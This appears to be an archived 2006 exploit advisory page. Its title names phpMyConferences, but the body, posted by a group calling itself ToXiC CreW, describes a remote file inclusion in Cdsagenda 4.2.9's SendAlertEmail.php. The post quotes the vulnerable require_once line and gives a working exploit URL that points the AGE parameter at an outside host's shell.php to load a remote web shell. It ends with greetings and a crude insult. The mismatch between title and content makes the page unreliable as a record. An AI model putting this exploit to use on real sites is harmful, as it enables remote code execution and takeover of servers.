Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14672
HistoryOct 13, 2006 - 12:00 a.m.

phpMyConferences <= 8.0.2 Remote File Inclusion

2006-10-1300:00:00
vulners.com
12
ToXiC

Cdsagenda 4.2.9 Remote File Inclusion by ToXiC CreW

ToXic Security Italian CreW

BuG FounD by Drago84

Application Affect:

Cdsagenda 4.2.9

Sorce Code:

http://cdsware.cern.ch/cdsagenda/download/cdsagenda-4.2.9.tar.gz

Page:

SendAlertEmail.php

Dir :

/cdsagenda-4.2.9/htdocs/modification/

Problem:

require_once "$AGE/AgeDB.php";

ExPloit :

http://www.site.com/cdsagenda/modification/SendAlertEmail.php?AGE=http://sonic-banda-di-lamer.gay/shell.php?

GrEatZ All Member of ToXiC, Str0ke

FUCK #Sonic

ToXiC